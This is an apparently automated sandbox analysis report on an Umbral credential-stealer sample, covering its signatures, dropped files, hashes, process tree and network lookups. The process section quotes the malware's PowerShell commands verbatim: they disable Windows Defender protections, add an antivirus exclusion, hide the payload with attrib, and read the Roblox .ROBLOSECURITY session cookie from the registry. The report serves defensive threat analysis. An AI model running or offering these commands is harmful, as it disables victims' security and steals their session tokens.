Malware Analysis Report

2024-11-15 04:40

Sample ID 231105-dt8tqscb99
Target ConsoleApplication1.obf.exe
SHA256 52770ec8f2e84b3e264870a7533286670e61bff2c8932f0cd6cc1f60af3323ae
Tags
umbral spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

52770ec8f2e84b3e264870a7533286670e61bff2c8932f0cd6cc1f60af3323ae

Threat Level: Known bad

The file ConsoleApplication1.obf.exe was found to be: Known bad.

Malicious Activity Summary

umbral spyware stealer

Detect Umbral payload

Umbral family

Umbral

Drops file in Drivers directory

Reads user/profile data of web browsers

Executes dropped EXE

Looks up external IP address via web service

Drops file in System32 directory

Unsigned PE

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-05 03:19

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral family

umbral

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-05 03:19

Reported

2023-11-05 03:19

Platform

win10v2004-20231023-en

Max time kernel

7s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe N/A
File created C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe N/A
File opened for modification C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\SYSTEM32\attrib.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2584 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
PID 2584 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
PID 2584 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
PID 2584 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
PID 2584 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
PID 1232 wrote to memory of 836 N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\SYSTEM32\attrib.exe
PID 1232 wrote to memory of 836 N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\SYSTEM32\attrib.exe
PID 1232 wrote to memory of 2328 N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 2328 N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 4192 N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 4192 N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 2840 N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 2840 N/A C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe

"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"

C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe

C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe

C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe

C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 163.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
NL 142.250.179.131:443 gstatic.com tcp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp

Files

C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe

MD5 cebf7458dceffcbb81a290cf045beb27
SHA1 98c74fa610995d61d2ee78a2ea888e003e9f436d
SHA256 97d22321ba783bf6d2119320d38d776bbc6bef42fe3dadecf512e23bbdd29660
SHA512 144f0da1e8060e08340f1b349f7bbb17be298ee3d27d056d5603143125b8a9d7abb9485d0f5a2a26e2e50f0d5970ecf5fc3a9e665eece70414c6dc1504b04a91

C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe

MD5 ef2711e9aeeb23297016ef32b46a3c7e
SHA1 ba51f478c1118d7803620367cb97ce2ceba52a5a
SHA256 2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759
SHA512 3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f

C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe

MD5 ef2711e9aeeb23297016ef32b46a3c7e
SHA1 ba51f478c1118d7803620367cb97ce2ceba52a5a
SHA256 2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759
SHA512 3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f

memory/1232-9-0x000001CAB1DD0000-0x000001CAB1E10000-memory.dmp

memory/1232-10-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/1232-11-0x000001CACC390000-0x000001CACC3A0000-memory.dmp

memory/2328-12-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ys2lioz.dti.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2328-23-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp

memory/2328-22-0x0000018BE5A10000-0x0000018BE5A32000-memory.dmp

memory/2328-24-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp

memory/2328-25-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp

memory/2328-26-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp

memory/2328-29-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4192-31-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/4192-41-0x000001CA484F0000-0x000001CA48500000-memory.dmp

memory/4192-42-0x000001CA484F0000-0x000001CA48500000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

memory/4192-44-0x000001CA484F0000-0x000001CA48500000-memory.dmp

memory/1232-45-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/4192-47-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/1232-50-0x000001CACC560000-0x000001CACC5D6000-memory.dmp

memory/1232-51-0x000001CACC4E0000-0x000001CACC530000-memory.dmp

memory/1232-52-0x000001CACC620000-0x000001CACC63E000-memory.dmp

memory/1232-53-0x000001CACC390000-0x000001CACC3A0000-memory.dmp

memory/2840-54-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/2840-55-0x000001FE8A010000-0x000001FE8A020000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a4d919c0b86abb8726889c70aa684ce6
SHA1 0c3d34a077526faea0c816b083d6b1594839aac8
SHA256 b40885d7d80c8b07f2b227cca9848c856257713d908f303390eb3c5b2ee4241a
SHA512 9af2bab67d210df0e710141123b4dc6e0613e5becdc2e58264d3f81ccad195d4b3f963f6dca71ebda40f26a0d57b9c730183d6b470fac677c8199890417423b9

memory/2840-77-0x000001FE8A010000-0x000001FE8A020000-memory.dmp

memory/2840-80-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/2372-90-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/2372-91-0x000002226B020000-0x000002226B030000-memory.dmp

memory/2372-92-0x000002226B020000-0x000002226B030000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b0a78e60bfb279d18fd3d6e7a67411f5
SHA1 9344fe3654a14bc66afb9dc6ea215fabfbe5c906
SHA256 a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb
SHA512 9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2

memory/2372-94-0x000002226B020000-0x000002226B030000-memory.dmp

memory/2372-96-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/1232-98-0x000001CAB3B80000-0x000001CAB3B8A000-memory.dmp

memory/1232-99-0x000001CACC530000-0x000001CACC542000-memory.dmp

memory/2660-102-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp

memory/2660-104-0x000002B86AA00000-0x000002B86AA10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b3ae619d7b2e604c5cda175980a9e909
SHA1 7fc9e9750d42637f9a663a4e143ccf8666249d02
SHA256 64ea1d41f18f3e3a3bef881901858bd8fed54f52d801521f9a3686073683b500
SHA512 bc72d169b668e759168b08e753591e81bf8fd08a41b7b14522bbc071ebc16548af231ad4a49385df31c690fa456a7b27c1f3554a80acc0a99e877c6717b377e0

memory/2660-103-0x000002B86AA00000-0x000002B86AA10000-memory.dmp

memory/2660-115-0x000002B86AA00000-0x000002B86AA10000-memory.dmp